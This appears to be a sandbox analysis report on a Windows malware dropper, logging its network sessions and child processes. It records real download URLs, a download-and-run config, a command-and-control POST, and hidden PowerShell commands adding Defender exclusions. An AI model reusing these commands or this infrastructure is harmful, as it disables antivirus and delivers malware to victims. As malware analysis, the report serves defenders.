                                                • httpbin.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.166.143.48 | 443 | 2924 | C:\Users\user\Desktop\UBONg7lmVR.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 10:55:13 UTC | 109 | OUT | GET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1
                                                Host: bitbucket.org
                                                Connection: Keep-Alive
2024-08-27 10:55:13 UTC | 5011 | IN | HTTP/1.1 302 Found
                                                Date: Tue, 27 Aug 2024 10:55:13 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Content-Length: 0
                                                Server: AtlassianEdge
                                                Location: https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBSRNVB4O&Signature=OlwE0Z7zZ9D5y5awFM9ze3uDdNQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDYfd%2BUjJB69jUrDiyn1ACmAHX7h00Ms9jdu77V8%2BbQiQIgZpc%2BMuqfuYdaGno1Dsx%2B7%2F1fwCn7flbDkj2a%2BGAQysgqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDD4%2BkCpT2xQmd8KInCqEAvZwZorvFr4FTztBPDZNc9pDNqkH8vr7IuwfigaQALQGTrPZ0n7R7G8mqGRWhz4oaHR4A8Ys2xjzqZGWPRpx0BFDyTjkmyoax2AaGjEDU5jLO%2BI9eW7cP4cukvQKbCyWWaT5nH2nOvfjMtwrY7mMwVVTiar%2B39%2Byq5c%2B9nWv%2B%2FPilmtLMfv8xN8csgfCaXMfzMODVnTCTrFl761VH1766hS%2B5Cnh8uVySF0REGckmSLzCJ%2F0ZEYpa5suMbY8vBrSg7MNEaMobmU8RJEsTH84YYV9rPdjJvJZV5WyDYDN%2F9UJkRyE%2B75nvJfPzPEsxIOsO9LaiYwGWgye6WWMhiJmt%2FDDxtgtMIzctrYGOp0Bw0hHLf7CiJ1Ipvl%2FLmwUS8fG9wj2hiSRqVvcq7rKCQJfS2sjcFo0U551qCcKaGgnV0%2BuJkrF%2B5QqVA9lRII [TRUNCATED]
                                                Expires: Tue, 27 Aug 2024 10:55:13 GMT
                                                Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                X-Used-Mesh: False
                                                Vary: Accept-Language, Origin
                                                Content-Language: en
                                                X-View-Name: bitbucket.apps.downloads.views.download_file
                                                X-Dc-Location: Micros-3
                                                X-Served-By: 4fe2bbba71e1
                                                X-Version: e13784b917ea
                                                X-Static-Version: e13784b917ea
                                                X-Request-Count: 2803
                                                X-Render-Time: 0.05108356475830078
                                                X-B3-Traceid: 6fc2fe0f11614904af77cca29dbbc976
                                                X-B3-Spanid: 6f6d391b9badfe4d
                                                X-Frame-Options: SAMEORIGIN
                                                Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassi [TRUNCATED]
                                                X-Usage-Quota-Remaining: 999030.695
                                                X-Usage-Request-Cost: 984.53
                                                X-Usage-User-Time: 0.027664
                                                X-Usage-System-Time: 0.001872
                                                X-Usage-Input-Ops: 0
                                                X-Usage-Output-Ops: 0
                                                Age: 0
                                                X-Cache: MISS
                                                X-Content-Type-Options: nosniff
                                                X-Xss-Protection: 1; mode=block
                                                Atl-Traceid: 6fc2fe0f11614904af77cca29dbbc976
                                                Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 52.216.214.209 | 443 | 2924 | C:\Users\user\Desktop\UBONg7lmVR.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 10:55:14 UTC | 1225 | OUT | GET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBSRNVB4O&Signature=OlwE0Z7zZ9D5y5awFM9ze3uDdNQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDYfd%2BUjJB69jUrDiyn1ACmAHX7h00Ms9jdu77V8%2BbQiQIgZpc%2BMuqfuYdaGno1Dsx%2B7%2F1fwCn7flbDkj2a%2BGAQysgqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDD4%2BkCpT2xQmd8KInCqEAvZwZorvFr4FTztBPDZNc9pDNqkH8vr7IuwfigaQALQGTrPZ0n7R7G8mqGRWhz4oaHR4A8Ys2xjzqZGWPRpx0BFDyTjkmyoax2AaGjEDU5jLO%2BI9eW7cP4cukvQKbCyWWaT5nH2nOvfjMtwrY7mMwVVTiar%2B39%2Byq5c%2B9nWv%2B%2FPilmtLMfv8xN8csgfCaXMfzMODVnTCTrFl761VH1766hS%2B5Cnh8uVySF0REGckmSLzCJ%2F0ZEYpa5suMbY8vBrSg7MNEaMobmU8RJEsTH84YYV9rPdjJvJZV5WyDYDN%2F9UJkRyE%2B75nvJfPzPEsxIOsO9LaiYwGWgye6WWMhiJmt%2FDDxtgtMIzctrYGOp0Bw0hHLf7CiJ1Ipvl%2FLmwUS8fG9wj2hiSRqVvcq7rKCQJfS2sjcFo0U551qCcKaGgnV0%2BuJkrF%2B5QqVA9lRII9%2B31TsHrG000N%2BnH3LKfIQS48cfIAiUtpWMew1%2 [TRUNCATED]
                                                Host: bbuseruploads.s3.amazonaws.com
                                                Connection: Keep-Alive
2024-08-27 10:55:14 UTC | 546 | IN | HTTP/1.1 200 OK
                                                x-amz-id-2: S1KyIekwOmajuce10dGrM9BD4Zh9pU7a71sol0el35WXZ4GDR7PCO3ke1sEZ+fxz03k6MlG2mOw=
                                                x-amz-request-id: TDE64GPW5DWEF5Q6
                                                Date: Tue, 27 Aug 2024 10:55:15 GMT
                                                Last-Modified: Mon, 26 Aug 2024 20:19:25 GMT
                                                ETag: "a499c507987982c951093e21df0c0d96"
                                                x-amz-server-side-encryption: AES256
                                                x-amz-version-id: izy_Ds9c9HofVlO8w4O6Dv7xs.26iHyB
                                                Content-Disposition: attachment; filename="Updated11.12.exe"
                                                Accept-Ranges: bytes
                                                Content-Type: application/x-msdownload
                                                Server: AmazonS3
                                                Content-Length: 8077824
                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49711 | 185.199.111.133 | 443 | 320 | C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 10:55:20 UTC | 140 | OUT | GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
2024-08-27 10:55:21 UTC | 897 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 254
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "2b7d5e7976210b6b6243eb731562fda7633790a0d3e8fe06e97c427ca3df3b40"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: C138:B7845:695157:749E29:66CDB080
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 10:55:21 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740042-EWR
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1724756121.054269,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 91e0a91cd95d8a87aefa6dc3ad0d6c4ba2f7a4cf
                                                Expires: Tue, 27 Aug 2024 11:00:21 GMT
                                                Source-Age: 14
2024-08-27 10:55:21 UTC | 254 | IN | Data Ascii:
{
  "folder_path": "C:\\Reka",
  "add_exclusions": true,
  "exclusion_paths": [
    "C:\\Users",
    "C:\\Windows",
    "C:\\Program Files",
    "C:\\Program Files (x86)",
    "C:\\Recovery",
    "C:\\Reka",
    "%USERPROFILE%\\Desktop"
  ]
}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49712 | 185.199.111.133 | 443 | 320 | C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 10:55:21 UTC | 141 | OUT | GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
2024-08-27 10:55:21 UTC | 898 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 271
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: text/plain; charset=utf-8
                                                ETag: "8afdee626e191786c845a423ef408c35314075f4a1c4350f44a55f7503d99b00"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: ACF5:EC530:6D5E83:78ABE5:66CDB097
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 10:55:21 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-nyc-kteb1890078-NYC
                                                X-Cache: MISS
                                                X-Cache-Hits: 0
                                                X-Timer: S1724756122.614030,VS0,VE10
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 5fc20857a82042935cb24f6492627ce30210505d
                                                Expires: Tue, 27 Aug 2024 11:00:21 GMT
                                                Source-Age: 0
2024-08-27 10:55:21 UTC | 271 | IN | Data Ascii:
{
  "downloads": [
    {
      "download_url": "https://github.com/workhasf/kelm/raw/main/iconozave.exe",
      "file_name": "rapnewsa.exe",
      "run": true
    },
    {
      "download_url": "",
      "file_name": "dll.exe",
      "run": fals


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49721 | 140.82.121.3 | 443 | 320 | C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 10:55:51 UTC | 127 | OUT | GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1
                                                Host: github.com
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
2024-08-27 10:55:51 UTC | 547 | IN | HTTP/1.1 302 Found
                                                Server: GitHub.com
                                                Date: Tue, 27 Aug 2024 10:55:35 GMT
                                                Content-Type: text/html; charset=utf-8
                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                Access-Control-Allow-Origin:
                                                Location: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
                                                Cache-Control: no-cache
                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                X-Frame-Options: deny
                                                X-Content-Type-Options: nosniff
                                                X-XSS-Protection: 0
                                                Referrer-Policy: no-referrer-when-downgrade
2024-08-27 10:55:51 UTC | 3261 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49722 | 185.199.111.133 | 443 | 320 | C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-27 10:55:52 UTC | 204 | OUT | GET /workhasf/kelm/main/iconozave.exe HTTP/1.1
                                                Host: raw.githubusercontent.com
                                                User-Agent: Go-http-client/1.1
                                                Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exe
                                                Accept-Encoding: gzip
2024-08-27 10:55:52 UTC | 897 | IN | HTTP/1.1 200 OK
                                                Connection: close
                                                Content-Length: 38912
                                                Cache-Control: max-age=300
                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                Content-Type: application/octet-stream
                                                ETag: "12c37a0d92e3f8714d00d8ffa40d644b8e2520270caa1a870ac073d1e42f9dd0"
                                                Strict-Transport-Security: max-age=31536000
                                                X-Content-Type-Options: nosniff
                                                X-Frame-Options: deny
                                                X-XSS-Protection: 1; mode=block
                                                X-GitHub-Request-Id: 6C35:16B1:419376:488FF3:66CDB0A7
                                                Accept-Ranges: bytes
                                                Date: Tue, 27 Aug 2024 10:55:52 GMT
                                                Via: 1.1 varnish
                                                X-Served-By: cache-ewr-kewr1740041-EWR
                                                X-Cache: HIT
                                                X-Cache-Hits: 1
                                                X-Timer: S1724756152.308295,VS0,VE1
                                                Vary: Authorization,Accept-Encoding,Origin
                                                Access-Control-Allow-Origin: *
                                                Cross-Origin-Resource-Policy: cross-origin
                                                X-Fastly-Request-ID: 4a522dcd289136a37b94e132cb999cdc5625b8ce
                                                Expires: Tue, 27 Aug 2024 11:00:52 GMT
                                                Source-Age: 17


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                6 | 192.168.2.5 | 49723 | 45.125.66.18 | 443 | 6420 | C:\Reka\rapnewsa.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 10:55:55 UTC | 287 | OUT | POST /api/receiver/recv HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48
                                                Content-Length: 3160
                                                Host: 45.125.66.18
                                                2024-08-27 10:55:55 UTC | 3160 | OUT | Data Ascii: {a33c7340-61ca-11ee-8c18-806e6f6e6963}
                                                2024-08-27 10:55:56 UTC | 238 | IN | HTTP/1.1 400 Bad Request
                                                Server: nginx/1.18.0
                                                Date: Tue, 27 Aug 2024 10:55:56 GMT
                                                Content-Type: application/json; charset=utf-8
                                                Content-Length: 61
                                                Connection: close
                                                X-Powered-By: Express
                                                ETag: W/"3d-0INsEuNarmdMljuUeTQ2pFyS2b4"
                                                2024-08-27 10:55:56 UTC | 61 | IN | Data Ascii: {"message":"Interval","error":"Bad Request","statusCode":400}


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                7 | 192.168.2.5 | 49724 | 34.194.69.213 | 443 | 320 | C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-08-27 10:56:00 UTC | 95 | OUT | GET /get HTTP/1.1
                                                Host: httpbin.org
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 10:56:00 UTC | 225 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 27 Aug 2024 10:56:00 GMT
                                                Content-Type: application/json
                                                Content-Length: 238
                                                Connection: close
                                                Server: gunicorn/19.9.0
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: true
                                                2024-08-27 10:56:00 UTC | 238 | IN | Data Ascii: { "args": {}, "headers": { "Host": "httpbin.org", "User-Agent": "Go-http-client/1.1", "X-Amzn-Trace-Id": "Root=1-66cdb0c0-565a62dd75ccd1b35b20c04a" }, "origin": "8.46.123.33", "url": "https://httpbin.org/get"}



                                                Target ID:0
                                                Start time:06:55:08
                                                Start date:27/08/2024
                                                Path:C:\Users\user\Desktop\UBONg7lmVR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\UBONg7lmVR.exe"
                                                Imagebase:0x750000
                                                File size:52'506'624 bytes
                                                MD5 hash:D2DB9A159617250A517F9D074AB8F947
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Target ID:3
                                                Start time:06:55:19
                                                Start date:27/08/2024
                                                Path:C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe"
                                                Imagebase:0x870000
                                                File size:8'077'824 bytes
                                                MD5 hash:A499C507987982C951093E21DF0C0D96
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Go lang
                                                Antivirus matches:
                                                • Detection: 11%, ReversingLabs
                                                • Detection: 8%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:5
                                                Start time:06:55:25
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:06:55:25
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:06:55:30
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:06:55:30
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:06:55:32
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:06:55:32
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:06:55:35
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:06:55:35
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:06:55:37
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:06:55:37
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:06:55:40
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:17
                                                Start time:06:55:40
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:06:55:42
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:06:55:42
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:06:55:51
                                                Start date:27/08/2024
                                                Path:C:\Reka\rapnewsa.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Reka\rapnewsa.exe
                                                Imagebase:0x230000
                                                File size:38'912 bytes
                                                MD5 hash:2D4E723C184D9403B078E53F2DE74A23
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 16%, ReversingLabs
                                                • Detection: 24%, Virustotal
                                                Has exited:true

                                                  Execution Graph

                                                  Execution Coverage:13.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:4.2%
                                                  Total number of Nodes:884
                                                  Total number of Limit Nodes:70

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($2$K$K$X$i
                                                  • API String ID: 0-301893868
                                                  • Opcode ID: 2acf934de26575beee069bc544ac10b1b2f5c78df296ef92b59f9310bf1c7e57
                                                  • Instruction ID: 3c0a798b1f3cb515d2624f9be71b755f1cf24b095fdda2cc7fb5c6f3a863f52b
                                                  • Opcode Fuzzy Hash: 2acf934de26575beee069bc544ac10b1b2f5c78df296ef92b59f9310bf1c7e57
                                                  • Instruction Fuzzy Hash: C0A20634A10704CFC715EF74C854BD9B7B2BFCA305F518AA9D14A6B360DB76A986CB40

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4513616921.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 099B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b0000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ($2$K$K$X$i
                                                  • API String ID: 0-301893868
                                                  • Opcode ID: 88d02f0fd9147be34a1725e7a65c5d1cfe2b6a77b708d10f2f0384571aabc503
                                                  • Instruction ID: f98dcd9f110a802d6d47e1006e246a799013b5b60095fd7cf04e3a035d3fbad6
                                                  • Opcode Fuzzy Hash: 88d02f0fd9147be34a1725e7a65c5d1cfe2b6a77b708d10f2f0384571aabc503
                                                  • Instruction Fuzzy Hash: 3BA2F634A10704CFC715EF74C854BDAB7B2BFCA305F509AA9D14A6B360DB76A986CB40

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4517475359.0000000015410000.00000040.00000800.00020000.00000000.sdmp, Offset: 15410000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15410000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID: DispatchMessage
                                                  • String ID:
                                                  • API String ID: 2061451462-0
                                                  • Opcode ID: 472b2cbd08c076a3e9cf01042a0195bbff7c915f1e8e74bc41bd187db573b3a1
                                                  • Instruction ID: c83e6a97ad1a407ee74699f0e9f0a1d04e0def363e47713ef7e5c60576896116
                                                  • Opcode Fuzzy Hash: 472b2cbd08c076a3e9cf01042a0195bbff7c915f1e8e74bc41bd187db573b3a1
                                                  • Instruction Fuzzy Hash: FAF12974A00209CFEB04DFA9C994B9DBBF2BF48314F158559D805AF3A5DB74E946CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4512242853.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7d20000_UBONg7lmVR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29e4c7b690d1bd72483ffbd4e6f16cea71819ca8ce294bd4ac5dbb62bb704d72
                                                  • Instruction ID: 7f11abb048484f273cb44edd16825ce6984fbe0493faab0f47e5827221cda941
